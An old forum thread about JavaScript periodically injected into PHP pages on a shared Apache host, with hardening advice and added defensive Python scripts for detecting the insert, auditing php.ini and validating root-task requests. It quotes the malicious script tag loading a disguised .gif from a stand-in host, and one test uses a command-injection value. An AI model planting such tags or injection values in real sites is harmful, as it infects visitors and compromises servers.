Solved

Apache PHP Code Insert Exploit Problem

Posted on 2004-04-27
1,082 Views
Last Modified: 2013-12-04
Hello,

My web host of whom I am a reseller runs Linux Red Hat Apache 1.3.29 and PHP 4.3.6.

We have a severe code insert problem.

On all PHP pages there is sometimes a JavaScript insert which is only created in the user's browser when accessing the page.

The JavaScript points to a gif file on another web hoster's server and there calls again a redirect which infects the user with a trojan or virus through the browser.

This code insert is periodic; sometimes it is there and sometimes not.

Below please find an example of the code insert. The insert however changes often:

script language="JavaScript" src="http://www.bad.tld/some/path/icon.gif?i=43&to= http://www.mad.tld/for_admin.html

It looks like something can trigger a dynamic loading of an Apache module that causes the code insert into PHP pages.

The tech tried to stop it with mod_security, but this mod stops many PHP apps from working, e.g. CMS, forums etc.

Does anybody have experience with this problem and hopefully a working fix?

Thanks for any help.
Question by:Wildorchid
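A small check that a hoster can run against the HTML a server actually delivers, to spot the kind of insert the question describes: a script element whose src is on a foreign host or is not a script file at all. This is an added example, not code from the thread; the sample page, the own-host list and the .js heuristic are constructed for illustration, so a site that legitimately serves scripts from other extensions or a CDN host would need those adjusted.

```python
"""Flag <script> sources that point off-site or at a non-script resource.

Added example (not from the thread). The sample page and host list are
constructed; the injected tag mirrors the pattern quoted in the question.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample of a served page: one local script, one script from the
# site's own host, and one insert of the kind the question reports.
SAMPLE_PAGE = """<html><head><title>Home</title>
<script src="/js/site.js"></script>
<script src="http://www.example.tld/js/menu.js"></script>
<script language="JavaScript" src="http://www.bad.tld/some/path/icon.gif?i=43&amp;to=http://www.mad.tld/for_admin.html"></script>
</head><body>Hello</body></html>"""

CLEAN_PAGE = """<html><head><script src="/js/site.js"></script></head><body></body></html>"""


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> start tag."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.sources.append(value)


def find_suspicious_scripts(html, own_hosts):
    """Return (src, reason) pairs for script sources that are off-site or
    whose path does not look like a JavaScript file.

    own_hosts: hostnames the site is allowed to load scripts from (constructed
    list in the example). Relative URLs have no host and are treated as own.
    """
    collector = ScriptSrcCollector()
    collector.feed(html)
    own = {h.lower() for h in own_hosts}
    findings = []
    for src in collector.sources:
        parts = urlsplit(src)
        host = (parts.hostname or "").lower()
        reasons = []
        if host and host not in own:
            reasons.append("off-site host %s" % host)
        # Heuristic (assumption): a script served from a .gif or other
        # non-.js path is exactly the disguise the question describes.
        if not parts.path.lower().endswith(".js"):
            reasons.append("non-.js resource used as script: %s" % parts.path)
        if reasons:
            findings.append((src, "; ".join(reasons)))
    return findings


if __name__ == "__main__":
    for src, reason in find_suspicious_scripts(SAMPLE_PAGE, ["www.example.tld"]):
        print("SUSPICIOUS:", src, "->", reason)
```

Run it against pages fetched from the live server (not from the filesystem), since the insert only appears in what is served; the local copy of the PHP file can look clean.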
8 Comments
 

Author Comment

by:Wildorchid
ID: 10928429
We have solved the problem.

Somehow somebody uploaded a file named icon.gif probably through a forum or CMS leak. This icon.gif is an exe that reconfigures PHP to load tons of extra modules and manipulates Apache. Then they use a robot that calls the icon.gif URL and triggers the PHP modification from time to time.

Then we have disabled dlopen: disable_functions = dlopen

Hope we got rid of this now, and hope the above helps somebody else too.

Cheers
 
LVL 51

Expert Comment

by:ahoffmann
ID: 10943092
allow_url_fopen = Off
open_basedir = /path/to/your/documentroot

should also help fixing such malicious code.
Unfortunately PHP is a security pain; it's hard to fix all problems.
Best is to use your CMS on a development server, and then copy the content to the live server, where you've disabled most PHP scripts.
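An audit script, added here and not part of the thread, that checks a php.ini for the settings Wildorchid and ahoffmann mention. The ini fragments are constructed. One caveat worth checking for: `dlopen` is the C library call, not a PHP function, so `disable_functions = dlopen` leaves PHP's own runtime extension loader `dl()` available; the directive that turns `dl()` off is `enable_dl = Off` (or listing `dl` in `disable_functions`), and the audit looks for that.

```python
"""Audit php.ini text for the hardening settings discussed in the thread.

Added example (not from the thread). The ini fragments are constructed.
"""

# Constructed: a default-ish php.ini before hardening.
WEAK_INI = """
; php.ini excerpt (constructed)
allow_url_fopen = On
enable_dl = On
disable_functions =
"""

# Constructed: the same settings after applying the thread's advice, with
# dl() disabled by name rather than the non-existent PHP function "dlopen".
HARDENED_INI = """
; php.ini excerpt (constructed)
allow_url_fopen = Off
open_basedir = "/var/www/html:/tmp"
enable_dl = Off
disable_functions = dl,system,exec,passthru,shell_exec
"""

# Constructed: what the original poster's fix alone gives you.
DLOPEN_ONLY_INI = "disable_functions = dlopen\n"


def parse_php_ini(text):
    """Minimal php.ini reader: key = value lines, ';' comments, quotes stripped."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#[" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        value = value.split(";", 1)[0].strip().strip('"').strip("'")
        settings[key.strip().lower()] = value
    return settings


def is_off(value):
    """PHP treats these strings as boolean false in ini directives."""
    return value.strip().lower() in ("", "0", "off", "false", "no", "none")


def audit_php_ini(text):
    """Return a dict of check name -> True if the hardening is in place."""
    s = parse_php_ini(text)
    disabled = {f.strip().lower() for f in s.get("disable_functions", "").split(",") if f.strip()}
    return {
        # PHP's default for allow_url_fopen and enable_dl is On, so absence
        # of the directive counts as not hardened.
        "allow_url_fopen_off": is_off(s.get("allow_url_fopen", "on")),
        "open_basedir_set": bool(s.get("open_basedir", "")),
        "enable_dl_off": is_off(s.get("enable_dl", "on")),
        "dl_disabled": "dl" in disabled,
    }


def hardening_gaps(text):
    """Names of the checks that fail, sorted, for a quick report."""
    return sorted(name for name, ok in audit_php_ini(text).items() if not ok)


if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("dlopen only", DLOPEN_ONLY_INI), ("hardened", HARDENED_INI)):
        print("%-12s gaps: %s" % (label, hardening_gaps(ini) or "none"))
```

Point it at the php.ini the running Apache actually uses (phpinfo() shows the path) rather than whichever copy is lying in /etc; a correct file that is not loaded fixes nothing.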
 
LVL 40

Expert Comment

by:jlevie
ID: 11011048
I'd say you still have a problem. When correctly set up there should be no way for anything to manipulate what modules Apache or PHP loads unless there's a root exploit available on the server. My guess is that your RedHat system doesn't have all of the security errata installed and someone is exploiting a vulnerability that one of those errata addresses.

I agree with ahoffmann that one should never have a CMS on a live server, but even then the process that extracts web page code from a CMS and updates the web server application should be running as the Apache user, who should in turn own all web content. And of course no web application may ever directly do anything as root. In cases where that's necessary the web app should leave a file with a fixed and known format for a root task to pick up, sanity check, and execute only if the contents of the file are "safe". And I can't emphasize enough that the sanity checking must exhibit extreme paranoia.
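An illustration of the hand-off jlevie describes, added here and not part of the thread: the root-side task reads a request file of a fixed format and refuses anything that is not exactly what it expects. The file format, the allowed actions and sites, and the publish tool path are all hypothetical.

```python
"""Root-side consumer of a fixed-format request file left by the web app.

Added example (not from the thread). Format, allow-lists and tool path are
hypothetical. The point is the paranoia: exact keys, allow-listed values,
no shell, and every deviation is a rejection.
"""
import re

MAX_REQUEST_BYTES = 1024                      # anything bigger is not a request
_REQUIRED_KEYS = ("action", "site")           # exactly these, no more, no less
_SITE_RE = re.compile(r"^[a-z0-9][a-z0-9.-]{0,252}[a-z0-9]$")

# Allow-lists (hypothetical): action -> argv prefix of the privileged tool,
# and the only sites the tool may be pointed at.
ALLOWED_ACTIONS = {"publish": ["/usr/local/bin/publish-site"]}
ALLOWED_SITES = {"example.tld", "shop.example.tld"}


class RejectedRequest(ValueError):
    """Raised for any request the root task will not act on."""


def parse_request(text):
    """Parse 'key=value' lines with no stripping, no blank lines, no extras."""
    if len(text.encode("utf-8", "replace")) > MAX_REQUEST_BYTES:
        raise RejectedRequest("request too large")
    fields = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        if "=" not in raw:
            raise RejectedRequest("line %d: not key=value" % lineno)
        key, _, value = raw.partition("=")
        if key in fields:
            raise RejectedRequest("duplicate key %r" % key)
        fields[key] = value
    if set(fields) != set(_REQUIRED_KEYS):
        raise RejectedRequest("unexpected or missing keys: %s" % sorted(fields))
    return fields


def validate_request(fields):
    """Map validated fields onto an argv list; never interpolate into a shell."""
    action, site = fields["action"], fields["site"]
    if action not in ALLOWED_ACTIONS:
        raise RejectedRequest("action not allowed: %r" % action)
    # Both the syntactic check and the allow-list must pass.
    if not _SITE_RE.match(site) or site not in ALLOWED_SITES:
        raise RejectedRequest("site not allowed: %r" % site)
    return ALLOWED_ACTIONS[action] + [site]


def build_command(text):
    """Return the argv the root task may run, or raise RejectedRequest."""
    return validate_request(parse_request(text))


def rejects(text):
    """True if build_command refuses the request (used for self-checks)."""
    try:
        build_command(text)
    except RejectedRequest:
        return True
    return False


if __name__ == "__main__":
    print(build_command("action=publish\nsite=example.tld"))
    for bad in ("action=publish\nsite=example.tld;id", "action=publish\nsite=example.tld\nuser=root", ""):
        print(repr(bad), "rejected:", rejects(bad))
```

The root task would hand the returned argv to subprocess.run without shell=True; the web application only ever writes the request file, and the privileged side decides, on its own terms, whether to do anything at all.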
 
LVL 51

Expert Comment

by:ahoffmann
ID: 11077727
disagreed
if such code is in a PHP page, then my suggestion prevents the server from loading external URLs
 
LVL 1

Accepted Solution

by:
Computer101 earned 0 total points
ID: 11113492
PAQed, with points refunded (500)

Computer101
E-E Admin
 
LVL 51

Expert Comment

by:ahoffmann
ID: 11145555
Computer101, why did you PAQ *with* refund?